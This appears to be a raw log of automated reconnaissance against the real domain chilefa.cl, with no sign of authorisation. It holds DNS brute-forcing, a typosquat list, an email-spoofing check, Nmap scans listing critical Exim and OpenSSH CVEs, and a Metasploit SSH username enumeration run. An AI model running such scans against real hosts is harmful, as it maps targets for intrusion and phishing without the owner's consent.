1881 Script Info: | MD5: 70ac 8c9c 5c66 2296 8b68 fae7 cd66 6b8c
1882 Script Info: |_SHA-1: 8479 a7ec 6b48 244a ccab 3110 8d59 1c65 7a70 6f28
1883 Script Info: |_ssl-date: 2020-03-02T11:58:38+00:00; -4s from scanner time.
1884 Os Info: Host: mx.google.com
1885 Script Info: |_clock-skew: -4s
1886 IP: 177.153.0.130
1887 Type: SPF
1888 Is Active: True (reset ttl 48)
1889 IP: 172.253.118.27
1890 HostName: alt1.aspmx.l.google.com Type: MX
1891 Country: United States
1892 Is Active: True (echo-reply ttl 38)
1893 Port: 25/tcp open smtp syn-ack ttl 103 Google gsmtp
1894 Script Info: | smtp-commands: mx.google.com at your service, [185.32.222.120], SIZE 157286400, 8BITMIME, STARTTLS, ENHANCEDSTATUSCODES, PIPELINING, CHUNKING, SMTPUTF8,
1895 Script Info: |_ 2.0.0 https://www.google.com/search?btnI&q=RFC+5321 v15si10803030plo.376 - gsmtp
1896 Script Info: | ssl-cert: Subject: commonName=mx.google.com/organizationName=Google LLC/stateOrProvinceName=California/countryName=US
1897 Script Info: | Subject Alternative Name: DNS:mx.google.com, DNS:alt1.aspmx.l.google.com, DNS:alt1.gmail-smtp-in.l.google.com, DNS:alt1.gmr-smtp-in.l.google.com, DNS:alt2.aspmx.l.google.com, DNS:alt2.gmail-smtp-in.l.google.com, DNS:alt2.gmr-smtp-in.l.google.com, DNS:alt3.aspmx.l.google.com, DNS:alt3.gmail-smtp-in.l.google.com, DNS:alt3.gmr-smtp-in.l.google.com, DNS:alt4.aspmx.l.google.com, DNS:alt4.gmail-smtp-in.l.google.com, DNS:alt4.gmr-smtp-in.l.google.com, DNS:aspmx.l.google.com, DNS:aspmx2.googlemail.com, DNS:aspmx3.googlemail.com, DNS:aspmx4.googlemail.com, DNS:aspmx5.googlemail.com, DNS:gmail-smtp-in.l.google.com, DNS:gmr-mx.google.com, DNS:gmr-smtp-in.l.google.com, DNS:mx1.smtp.goog, DNS:mx2.smtp.goog, DNS:mx3.smtp.goog, DNS:mx4.smtp.goog
1898 Script Info: | Issuer: commonName=GTS CA 1O1/organizationName=Google Trust Services/countryName=US
1899 Script Info: | Public Key type: rsa
1900 Script Info: | Public Key bits: 2048
1901 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1902 Script Info: | Not valid before: 2020-02-12T11:46:31
1903 Script Info: | Not valid after: 2020-05-06T11:46:31
1904 Script Info: | MD5: 70ac 8c9c 5c66 2296 8b68 fae7 cd66 6b8c
1905 Script Info: |_SHA-1: 8479 a7ec 6b48 244a ccab 3110 8d59 1c65 7a70 6f28
1906 Script Info: |_ssl-date: 2020-03-02T11:59:31+00:00; -4s from scanner time.
1907 Os Info: Host: mx.google.com
1908 Script Info: |_clock-skew: -4s
1909
1910--------------End Summary --------------
1911-----------------------------------------
1912#####################################################################################################################################
1913----- chilefa.cl -----
1914
1915
1916Host's addresses:
1917__________________
1918
1919chilefa.cl. 3600 IN A 143.95.110.248
1920
1921
1922Wildcard detection using: qzhfihunyfnc
1923_______________________________________
1924
1925qzhfihunyfnc.chilefa.cl. 3600 IN A 143.95.110.248
1926
1927
1928!!!!!!!!!!!!!!!!!!!!!!!!!!!!
1929
1930 Wildcards detected, all subdomains will point to the same IP address
1931 Omitting results containing 143.95.110.248.
1932 Maybe you are using OpenDNS servers.
1933
1934!!!!!!!!!!!!!!!!!!!!!!!!!!!!
1935
1936
1937Name Servers:
1938______________
1939
1940dns2.site5.com. 300 IN A 108.174.149.181
1941dns.site5.com. 234 IN A 162.210.50.254
1942
1943
1944Mail (MX) Servers:
1945___________________
1946
1947alt2.aspmx.l.google.com. 0 IN A 64.233.189.27
1948alt4.aspmx.l.google.com. 165 IN A 108.177.8.26
1949aspmx.l.google.com. 165 IN A 108.177.127.26
1950alt3.aspmx.l.google.com. 102 IN A 74.125.28.27
1951alt1.aspmx.l.google.com. 293 IN A 172.253.118.26
1952
1953
1954Brute forcing with /usr/share/dnsenum/dns.txt:
1955_______________________________________________
1956
1957
1958
1959Launching Whois Queries:
1960_________________________
1961
1962 whois ip result: 143.95.110.0 -> 143.95.0.0/16
1963
1964
1965chilefa.cl__________
1966
1967 143.95.0.0/16
1968#####################################################################################################################################
1969Source:
1970whois.arin.net
1971IP Address:
1972143.95.110.248
1973Name:
1974ATHENIX
1975Handle:
1976NET-143-95-0-0-1
1977Registration Date:
19789/7/90
1979Range:
1980143.95.0.0-143.95.255.255
1981Org:
1982Athenix Inc.
1983Org Handle:
1984ATHENI
1985Address:
1986C/O Athenix Inc
1987City:
1988Burlington
1989State/Province:
1990MA
1991Postal Code:
199201803
1993Country:
1994United States
1995Name Servers:
1996#####################################################################################################################################
1997URLCrazy Domain Report
1998Domain : www.chilefa.cl
1999Keyboard : qwerty
2000At : 2020-03-02 06:37:49 -0500
2001
2002# Please wait. 153 hostnames to process
2003
2004Typo Type Typo DNS-A CC-A DNS-MX Extn
2005------------------------------------------------------------------------------------------------------------------
2006Character Omission ww.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2007Character Omission www.chiefa.cl ? cl
2008Character Omission www.chilea.cl ? cl
2009Character Omission www.chilef.cl ? cl
2010Character Omission www.chilfa.cl ? cl
2011Character Omission www.chlefa.cl ? cl
2012Character Omission www.cilefa.cl ? cl
2013Character Omission www.hilefa.cl ? cl
2014Character Omission wwwchilefa.cl ? cl
2015Character Repeat www.cchilefa.cl ? cl
2016Character Repeat www.chhilefa.cl ? cl
2017Character Repeat www.chiilefa.cl ? cl
2018Character Repeat www.chileefa.cl ? cl
2019Character Repeat www.chilefaa.cl ? cl
2020Character Repeat www.chileffa.cl 201.148.104.52 chileffa.cl cl
2021Character Repeat www.chillefa.cl ? cl
2022Character Repeat wwww.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2023Character Swap ww.wchilefa.cl ? cl
2024Character Swap www.chielfa.cl ? cl
2025Character Swap www.chileaf.cl ? cl
2026Character Swap www.chilefa.lc ? lc
2027Character Swap www.chilfea.cl ? cl
2028Character Swap www.chliefa.cl ? cl
2029Character Swap www.cihlefa.cl ? cl
2030Character Swap www.hcilefa.cl ? cl
2031Character Swap wwwc.hilefa.cl ? cl
2032Character Replacement eww.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2033Character Replacement qww.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2034Character Replacement wew.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2035Character Replacement wqw.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2036Character Replacement wwe.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2037Character Replacement wwq.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2038Character Replacement www.cgilefa.cl ? cl
2039Character Replacement www.chikefa.cl ? cl
2040Character Replacement www.chileda.cl ? cl
2041Character Replacement www.chilefs.cl ? cl
2042Character Replacement www.chilega.cl ? cl
2043Character Replacement www.chilrfa.cl ? cl
2044Character Replacement www.chilwfa.cl ? cl
2045Character Replacement www.cholefa.cl ? cl
2046Character Replacement www.chulefa.cl ? cl
2047Character Replacement www.cjilefa.cl ? cl
2048Character Replacement www.vhilefa.cl ? cl
2049Character Replacement www.xhilefa.cl ? cl
2050Double Character Replacement eew.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2051Double Character Replacement qqw.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2052Double Character Replacement wee.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2053Double Character Replacement wqq.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2054Character Insertion weww.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2055Character Insertion wqww.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2056Character Insertion wwew.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2057Character Insertion wwqw.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2058Character Insertion www.chgilefa.cl ? cl
2059Character Insertion www.chilefas.cl ? cl
2060Character Insertion www.chilefda.cl ? cl
2061Character Insertion www.chilefga.cl ? cl
2062Character Insertion www.chilerfa.cl ? cl
2063Character Insertion www.chilewfa.cl ? cl
2064Character Insertion www.chilkefa.cl ? cl
2065Character Insertion www.chiolefa.cl ? cl
2066Character Insertion www.chiulefa.cl ? cl
2067Character Insertion www.chjilefa.cl ? cl
2068Character Insertion www.cvhilefa.cl ? cl
2069Character Insertion www.cxhilefa.cl ? cl
2070Character Insertion wwwe.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2071Character Insertion wwwq.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2072Missing Dot wwwwww.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2073Singular or Pluralise chilefa.cl 143.95.110.248 US,UNITED STATES alt4.aspmx.l.google.com cl
2074Singular or Pluralise chilefas.cl ? cl
2075Vowel Swap www.chalefa.cl ? cl
2076Vowel Swap www.chelefa.cl ? cl
2077Vowel Swap www.chilafa.cl ? cl
2078Vowel Swap www.chilefe.cl ? cl
2079Vowel Swap www.chilefi.cl ? cl
2080Vowel Swap www.chilefo.cl ? cl
2081Vowel Swap www.chilefu.cl ? cl
2082Vowel Swap www.chilifa.cl ? cl
2083Vowel Swap www.chilofa.cl ? cl
2084Vowel Swap www.chilufa.cl ? cl
2085Homophones www.chayelefa.cl ? cl
2086Homophones www.cheyelefa.cl ? cl
2087Homophones www.chighlefa.cl ? cl
2088Bit Flipping 7ww.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2089Bit Flipping gww.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2090Bit Flipping sww.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2091Bit Flipping uww.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2092Bit Flipping vww.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2093Bit Flipping w7w.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2094Bit Flipping wgw.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2095Bit Flipping wsw.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2096Bit Flipping wuw.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2097Bit Flipping wvw.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2098Bit Flipping ww7.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2099Bit Flipping wwg.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2100Bit Flipping wws.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2101Bit Flipping wwu.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2102Bit Flipping wwv.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2103Bit Flipping www.ahilefa.cl ? cl
2104Bit Flipping www.bhilefa.cl ? cl
2105Bit Flipping www.chhlefa.cl ? cl
2106Bit Flipping www.chidefa.cl ? cl
2107Bit Flipping www.chihefa.cl ? cl
2108Bit Flipping www.childfa.cl ? cl
2109Bit Flipping www.chileba.cl ? cl
2110Bit Flipping www.chilefa.cd ? cd
2111Bit Flipping www.chilefa.ch ? ch
2112Bit Flipping www.chilefa.cm ? cm
2113Bit Flipping www.chilefa.cn ? cn
2114Bit Flipping www.chilefa.gl ? gl
2115Bit Flipping www.chilefa.sl ? sl
2116Bit Flipping www.chilefc.cl ? cl
2117Bit Flipping www.chilefq.cl ? cl
2118Bit Flipping www.chilena.cl 45.60.154.104 cl
2119Bit Flipping www.chileva.cl 207.38.94.53 US,UNITED STATES mx8.webfaction.com cl
2120Bit Flipping www.chilgfa.cl ? cl
2121Bit Flipping www.chilmfa.cl ? cl
2122Bit Flipping www.chimefa.cl ? cl
2123Bit Flipping www.chinefa.cl ? cl
2124Bit Flipping www.chklefa.cl ? cl
2125Bit Flipping www.chmlefa.cl ? cl
2126Bit Flipping www.chylefa.cl ? cl
2127Bit Flipping www.ciilefa.cl ? cl
2128Bit Flipping www.clilefa.cl ? cl
2129Bit Flipping www.cxilefa.cl ? cl
2130Bit Flipping www.ghilefa.cl ? cl
2131Bit Flipping www.khilefa.cl ? cl
2132Bit Flipping www.shilefa.cl ? cl
2133Bit Flipping wwwnchilefa.cl ? cl
2134Homoglyphs vvvvvv.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2135Homoglyphs vvvvw.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2136Homoglyphs vvwvv.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2137Homoglyphs vvww.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2138Homoglyphs wvvvv.chilefa.cl 143.95.110.248 AU,AUSTRALIA cl
2139Homoglyphs wvvw.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2140Homoglyphs wwvv.chilefa.cl 143.95.110.248 US,UNITED STATES cl
2141Homoglyphs www.chi1efa.cl ? cl
2142Homoglyphs www.chllefa.cl ? cl
2143Wrong TLD chilefa.ca ? ca
2144Wrong TLD chilefa.ch ? ch
2145Wrong TLD chilefa.com 15.164.3.247 US,UNITED STATES com
2146Wrong TLD chilefa.de ? de
2147Wrong TLD chilefa.edu ? edu
2148Wrong TLD chilefa.es ? es
2149Wrong TLD chilefa.fr ? fr
2150Wrong TLD chilefa.it ? it
2151Wrong TLD chilefa.jp ? jp
2152Wrong TLD chilefa.net ? net
2153Wrong TLD chilefa.nl ? nl
2154Wrong TLD chilefa.no ? no
2155Wrong TLD chilefa.org ? org
2156Wrong TLD chilefa.ru ? ru
2157Wrong TLD chilefa.se ? se
2158Wrong TLD chilefa.us ? us
2159######################################################################################################################################
2160[+] www.chilefa.cl has no SPF record!
2161[*] No DMARC record found. Looking for organizational record
2162[+] No organizational DMARC record
2163[+] Spoofing possible for www.chilefa.cl!
2164#####################################################################################################################################
2165WARNING: Duplicate port number(s) specified. Are you alert enough to be using Nmap? Have some coffee or Jolt(tm).
2166Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-02 06:46 EST
2167Nmap scan report for www.chilefa.cl (143.95.110.248)
2168Host is up (0.43s latency).
2169rDNS record for 143.95.110.248: ip-143-95-110-248.iplocal
2170Not shown: 478 closed ports, 4 filtered ports
2171Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
2172PORT STATE SERVICE
217322/tcp open ssh
217425/tcp open smtp
217553/tcp open domain
217680/tcp open http
2177110/tcp open pop3
2178143/tcp open imap
2179443/tcp open https
2180465/tcp open smtps
2181587/tcp open submission
2182993/tcp open imaps
2183995/tcp open pop3s
21843306/tcp open mysql
21858080/tcp open http-proxy
21868443/tcp open https-alt
2187
2188Nmap done: 1 IP address (1 host up) scanned in 6.51 seconds
2189#####################################################################################################################################
2190Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-02 06:46 EST
2191Nmap scan report for www.chilefa.cl (143.95.110.248)
2192Host is up (0.38s latency).
2193rDNS record for 143.95.110.248: ip-143-95-110-248.iplocal
2194Not shown: 13 closed ports
2195PORT STATE SERVICE
219653/udp open|filtered domain
2197123/udp open|filtered ntp
2198
2199Nmap done: 1 IP address (1 host up) scanned in 9.23 seconds
2200#####################################################################################################################################
2201# general
2202(gen) banner: SSH-2.0-OpenSSH_5.3
2203(gen) software: OpenSSH 5.3
2204(gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+
2205(gen) compression: enabled (zlib@openssh.com)
2206
2207# key exchange algorithms
2208(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
2209 `- [info] available since OpenSSH 4.4
2210
2211# host-key algorithms
2212(key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
2213(key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
2214 `- [warn] using small 1024-bit modulus
2215 `- [warn] using weak random number generator could reveal the key
2216 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
2217
2218# encryption algorithms (ciphers)
2219(enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
2220(enc) aes192-ctr -- [info] available since OpenSSH 3.7
2221(enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
2222
2223# message authentication code algorithms
2224(mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
2225 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
2226(mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
2227 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
2228(mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2229 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2230 `- [warn] using encrypt-and-MAC mode
2231 `- [info] available since OpenSSH 2.5.0
2232(mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2233 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2234 `- [warn] using encrypt-and-MAC mode
2235 `- [info] available since OpenSSH 2.1.0
2236
2237# algorithm recommendations (for OpenSSH 5.3)
2238(rec) -ssh-dss -- key algorithm to remove
2239(rec) -hmac-ripemd160 -- mac algorithm to remove
2240(rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
2241######################################################################################################################################
2242Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-02 06:46 EST
2243NSE: Loaded 51 scripts for scanning.
2244NSE: Script Pre-scanning.
2245Initiating NSE at 06:46
2246Completed NSE at 06:46, 0.00s elapsed
2247Initiating NSE at 06:46
2248Completed NSE at 06:46, 0.00s elapsed
2249Initiating Parallel DNS resolution of 1 host. at 06:46
2250Completed Parallel DNS resolution of 1 host. at 06:46, 0.02s elapsed
2251Initiating SYN Stealth Scan at 06:46
2252Scanning www.chilefa.cl (143.95.110.248) [1 port]
2253Discovered open port 22/tcp on 143.95.110.248
2254Completed SYN Stealth Scan at 06:46, 0.32s elapsed (1 total ports)
2255Initiating Service scan at 06:46
2256Scanning 1 service on www.chilefa.cl (143.95.110.248)
2257Completed Service scan at 06:46, 0.62s elapsed (1 service on 1 host)
2258Initiating OS detection (try #1) against www.chilefa.cl (143.95.110.248)
2259Retrying OS detection (try #2) against www.chilefa.cl (143.95.110.248)
2260WARNING: RST from 143.95.110.248 port 22 -- is this port really open?
2261WARNING: RST from 143.95.110.248 port 22 -- is this port really open?
2262WARNING: RST from 143.95.110.248 port 22 -- is this port really open?
2263WARNING: RST from 143.95.110.248 port 22 -- is this port really open?
2264WARNING: RST from 143.95.110.248 port 22 -- is this port really open?
2265WARNING: RST from 143.95.110.248 port 22 -- is this port really open?
2266Initiating Traceroute at 06:46
2267Completed Traceroute at 06:46, 0.67s elapsed
2268Initiating Parallel DNS resolution of 19 hosts. at 06:46
2269Completed Parallel DNS resolution of 19 hosts. at 06:47, 2.52s elapsed
2270NSE: Script scanning 143.95.110.248.
2271Initiating NSE at 06:47
2272Completed NSE at 06:47, 3.19s elapsed
2273Initiating NSE at 06:47
2274Completed NSE at 06:47, 0.00s elapsed
2275Nmap scan report for www.chilefa.cl (143.95.110.248)
2276Host is up (0.40s latency).
2277rDNS record for 143.95.110.248: ip-143-95-110-248.iplocal
2278
2279PORT STATE SERVICE VERSION
228022/tcp open ssh OpenSSH 5.3 (protocol 2.0)
2281|_ssh-auth-methods: ERROR: Script execution failed (use -d to debug)
2282|_ssh-brute: ERROR: Script execution failed (use -d to debug)
2283|_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
2284|_ssh-run: ERROR: Script execution failed (use -d to debug)
2285| vulners:
2286| cpe:/a:openbsd:openssh:5.3:
2287| CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478
2288| CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
2289| CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708
2290| CVE-2010-5107 5.0 https://vulners.com/cve/CVE-2010-5107
2291| CVE-2016-0777 4.0 https://vulners.com/cve/CVE-2016-0777
2292| CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755
2293| CVE-2012-0814 3.5 https://vulners.com/cve/CVE-2012-0814
2294| CVE-2011-5000 3.5 https://vulners.com/cve/CVE-2011-5000
2295|_ CVE-2011-4327 2.1 https://vulners.com/cve/CVE-2011-4327
2296Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2297Aggressive OS guesses: Motorola RFS 6000 wireless switch (94%), Konica Minolta 1600f printer (91%), ZyXEL ZyWALL 2 firewall or Prestige 660HW-61 ADSL router (ZyNOS 3.62) (89%), Kyocera CopyStar CS-2560 printer (89%), Tomato 1.27 - 1.28 (Linux 2.4.20) (88%), Linux 3.2.0 (88%), MikroTik RouterOS 6.15 (Linux 3.3.5) (88%), DD-WRT (Linux 2.4.35s) (88%), Linux 2.6.18 - 2.6.22 (88%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (87%)
2298No exact OS matches for host (test conditions non-ideal).
2299Network Distance: 19 hops
2300
2301TRACEROUTE (using port 22/tcp)
2302HOP RTT ADDRESS
23031 241.42 ms 10.202.8.1
23042 241.47 ms 185.32.222.3
23053 241.50 ms slx9540-40gb.datasource.ch (91.201.58.73)
23064 241.52 ms zch-b2-link.telia.net (62.115.180.122)
23075 241.57 ms ffm-bb1-link.telia.net (62.115.142.110)
23086 241.56 ms ffm-b5-link.telia.net (62.115.114.89)
23097 241.60 ms be3031.agr41.fra03.atlas.cogentco.com (130.117.14.197)
23108 241.66 ms be3186.ccr41.fra03.atlas.cogentco.com (130.117.0.1)
23119 240.91 ms be2813.ccr41.ams03.atlas.cogentco.com (130.117.0.121)
231210 422.93 ms be2183.ccr22.lpl01.atlas.cogentco.com (154.54.58.69)
231311 422.99 ms be3043.ccr22.ymq01.atlas.cogentco.com (154.54.44.166)
231412 301.97 ms be3260.ccr32.yyz02.atlas.cogentco.com (154.54.42.89)
231513 423.00 ms be2994.ccr22.cle04.atlas.cogentco.com (154.54.31.233)
231614 423.03 ms be2717.ccr41.ord01.atlas.cogentco.com (154.54.6.221)
231715 423.09 ms be2831.ccr21.mci01.atlas.cogentco.com (154.54.42.165)
231816 423.07 ms be2433.ccr32.dfw01.atlas.cogentco.com (154.54.3.213)
231917 423.14 ms be2561.rcr21.b010621-0.dfw01.atlas.cogentco.com (154.54.6.74)
232018 423.14 ms 38.32.13.210
232119 423.14 ms ip-143-95-110-248.iplocal (143.95.110.248)
2322
2323NSE: Script Post-scanning.
2324Initiating NSE at 06:47
2325Completed NSE at 06:47, 0.00s elapsed
2326Initiating NSE at 06:47
2327Completed NSE at 06:47, 0.00s elapsed
2328######################################################################################################################################
2329USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
2330RHOSTS => www.chilefa.cl
2331RHOST => www.chilefa.cl
2332[*] 143.95.110.248:22 - SSH - Using malformed packet technique
2333[*] 143.95.110.248:22 - SSH - Starting scan
2334[-] 143.95.110.248:22 - SSH - User 'admin' on could not connect
2335[-] 143.95.110.248:22 - SSH - User 'administrator' on could not connect
2336[-] 143.95.110.248:22 - SSH - User 'anonymous' on could not connect
2337[-] 143.95.110.248:22 - SSH - User 'backup' on could not connect
2338[-] 143.95.110.248:22 - SSH - User 'bee' on could not connect
2339[-] 143.95.110.248:22 - SSH - User 'ftp' on could not connect
2340[-] 143.95.110.248:22 - SSH - User 'guest' on could not connect
2341[-] 143.95.110.248:22 - SSH - User 'GUEST' on could not connect
2342[-] 143.95.110.248:22 - SSH - User 'info' on could not connect
2343[-] 143.95.110.248:22 - SSH - User 'mail' on could not connect
2344[-] 143.95.110.248:22 - SSH - User 'mailadmin' on could not connect
2345[-] 143.95.110.248:22 - SSH - User 'msfadmin' on could not connect
2346[-] 143.95.110.248:22 - SSH - User 'mysql' on could not connect
2347[-] 143.95.110.248:22 - SSH - User 'nobody' on could not connect
2348[-] 143.95.110.248:22 - SSH - User 'oracle' on could not connect
2349[-] 143.95.110.248:22 - SSH - User 'owaspbwa' on could not connect
2350[-] 143.95.110.248:22 - SSH - User 'postfix' on could not connect
2351[-] 143.95.110.248:22 - SSH - User 'postgres' on could not connect
2352[-] 143.95.110.248:22 - SSH - User 'private' on could not connect
2353[-] 143.95.110.248:22 - SSH - User 'proftpd' on could not connect
2354[-] 143.95.110.248:22 - SSH - User 'public' on could not connect
2355[-] 143.95.110.248:22 - SSH - User 'root' on could not connect
2356[-] 143.95.110.248:22 - SSH - User 'superadmin' on could not connect
2357[-] 143.95.110.248:22 - SSH - User 'support' on could not connect
2358[-] 143.95.110.248:22 - SSH - User 'sys' on could not connect
2359[-] 143.95.110.248:22 - SSH - User 'system' on could not connect
2360[-] 143.95.110.248:22 - SSH - User 'systemadmin' on could not connect
2361[-] 143.95.110.248:22 - SSH - User 'systemadministrator' on could not connect
2362[-] 143.95.110.248:22 - SSH - User 'test' on could not connect
2363[-] 143.95.110.248:22 - SSH - User 'tomcat' on could not connect
2364[-] 143.95.110.248:22 - SSH - User 'user' on could not connect
2365[-] 143.95.110.248:22 - SSH - User 'webmaster' on could not connect
2366[-] 143.95.110.248:22 - SSH - User 'www-data' on could not connect
2367[-] 143.95.110.248:22 - SSH - User 'Fortimanager_Access' on could not connect
2368[*] Scanned 1 of 1 hosts (100% complete)
2369[*] Auxiliary module execution completed
2370######################################################################################################################################
2371Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-02 06:56 EST
2372NSE: Loaded 55 scripts for scanning.
2373NSE: Script Pre-scanning.
2374Initiating NSE at 06:56
2375Completed NSE at 06:56, 0.00s elapsed
2376Initiating NSE at 06:56
2377Completed NSE at 06:56, 0.00s elapsed
2378Initiating Parallel DNS resolution of 1 host. at 06:56
2379Completed Parallel DNS resolution of 1 host. at 06:56, 0.02s elapsed
2380Initiating SYN Stealth Scan at 06:56
2381Scanning www.chilefa.cl (143.95.110.248) [1 port]
2382Discovered open port 25/tcp on 143.95.110.248
2383Completed SYN Stealth Scan at 06:56, 0.36s elapsed (1 total ports)
2384Initiating Service scan at 06:56
2385Scanning 1 service on www.chilefa.cl (143.95.110.248)
2386Completed Service scan at 06:56, 5.86s elapsed (1 service on 1 host)
2387Initiating OS detection (try #1) against www.chilefa.cl (143.95.110.248)
2388Retrying OS detection (try #2) against www.chilefa.cl (143.95.110.248)
2389WARNING: RST from 143.95.110.248 port 25 -- is this port really open?
2390WARNING: RST from 143.95.110.248 port 25 -- is this port really open?
2391WARNING: RST from 143.95.110.248 port 25 -- is this port really open?
2392WARNING: RST from 143.95.110.248 port 25 -- is this port really open?
2393WARNING: RST from 143.95.110.248 port 25 -- is this port really open?
2394WARNING: RST from 143.95.110.248 port 25 -- is this port really open?
2395Initiating Traceroute at 06:56
2396Completed Traceroute at 06:56, 0.87s elapsed
2397Initiating Parallel DNS resolution of 19 hosts. at 06:56
2398Completed Parallel DNS resolution of 19 hosts. at 06:56, 2.52s elapsed
2399NSE: Script scanning 143.95.110.248.
2400Initiating NSE at 06:56
2401Completed NSE at 06:56, 2.15s elapsed
2402Initiating NSE at 06:56
2403Completed NSE at 06:56, 0.00s elapsed
2404Nmap scan report for www.chilefa.cl (143.95.110.248)
2405Host is up (0.38s latency).
2406rDNS record for 143.95.110.248: ip-143-95-110-248.iplocal
2407
2408PORT STATE SERVICE VERSION
240925/tcp open smtp Exim smtpd 4.91
2410|_smtp-commands: Couldn't establish connection on port 25
2411| smtp-enum-users:
2412|_ Couldn't establish connection on port 25
2413|_smtp-open-relay: Couldn't establish connection on port 25
2414| vulners:
2415| cpe:/a:exim:exim:4.91:
2416| CVE-2019-15846 10.0 https://vulners.com/cve/CVE-2019-15846
2417| CVE-2019-13917 10.0 https://vulners.com/cve/CVE-2019-13917
2418|_ CVE-2019-10149 7.5 https://vulners.com/cve/CVE-2019-10149
2419Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2420Aggressive OS guesses: Motorola RFS 6000 wireless switch (94%), Konica Minolta 1600f printer (91%), ZyXEL ZyWALL 2 firewall or Prestige 660HW-61 ADSL router (ZyNOS 3.62) (89%), Kyocera CopyStar CS-2560 printer (89%), Tomato 1.27 - 1.28 (Linux 2.4.20) (88%), Linux 3.2.0 (88%), MikroTik RouterOS 6.15 (Linux 3.3.5) (88%), DD-WRT (Linux 2.4.35s) (88%), Linux 2.6.18 - 2.6.22 (88%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (87%)
2421No exact OS matches for host (test conditions non-ideal).
2422Network Distance: 19 hops
2423Service Info: Host: uscentral421.accountservergroup.com
2424
2425TRACEROUTE (using port 25/tcp)
2426HOP RTT ADDRESS
24271 367.78 ms 10.202.8.1
24282 367.81 ms 185.32.222.3
24293 367.83 ms core02-40gb.datasource.ch (91.201.58.73)
24304 367.51 ms zch-b2-link.telia.net (62.115.180.122)
24315 367.55 ms ffm-bb1-link.telia.net (62.115.142.110)
24326 367.56 ms ffm-b5-link.telia.net (62.115.114.89)
24337 367.56 ms be3031.agr41.fra03.atlas.cogentco.com (130.117.14.197)
24348 367.56 ms be3186.ccr41.fra03.atlas.cogentco.com (130.117.0.1)
24359 242.99 ms be2813.ccr41.ams03.atlas.cogentco.com (130.117.0.121)
243610 366.10 ms be2183.ccr22.lpl01.atlas.cogentco.com (154.54.58.69)
243711 366.11 ms be3042.ccr21.ymq01.atlas.cogentco.com (154.54.44.162)
243812 366.10 ms be3260.ccr32.yyz02.atlas.cogentco.com (154.54.42.89)
243913 366.12 ms be2890.ccr22.cle04.atlas.cogentco.com (154.54.82.245)
244014 366.12 ms be2717.ccr41.ord01.atlas.cogentco.com (154.54.6.221)
244115 493.90 ms be2831.ccr21.mci01.atlas.cogentco.com (154.54.42.165)
244216 493.90 ms be2433.ccr32.dfw01.atlas.cogentco.com (154.54.3.213)
244317 493.93 ms be2561.rcr21.b010621-0.dfw01.atlas.cogentco.com (154.54.6.74)
